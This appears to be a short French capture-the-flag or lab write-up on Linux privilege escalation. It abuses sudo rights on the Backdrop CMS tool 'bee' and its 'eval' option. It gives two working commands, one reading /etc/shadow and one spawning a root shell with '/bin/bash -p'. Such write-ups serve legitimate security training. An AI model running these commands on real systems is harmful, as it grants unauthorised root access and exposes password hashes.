Nous vérifions les privilèges sudo :
sudo -l
Nous pouvons exécuter /usr/local/bin/bee en tant que root.
Analyse de Bee
Bee est un outil d'administration pour Backdrop CMS, similaire à Drush pour Drupal. Il permet l'exécution de diverses commandes.
Usage: bee [global-options] [options] [arguments]
Nous identifions l'option eval, qui permet d'exécuter du code PHP arbitraire.
Lecture de /etc/shadow
Obtention d'un shell root
Mis à jour il y a 11 mois
sudo /usr/local/bin/bee --root=/var/www/html eval 'echo shell_exec("cat /etc/shadow 2>&1");'
sudo /usr/local/bin/bee --root=/var/www/html eval 'shell_exec("/bin/bash -p");'
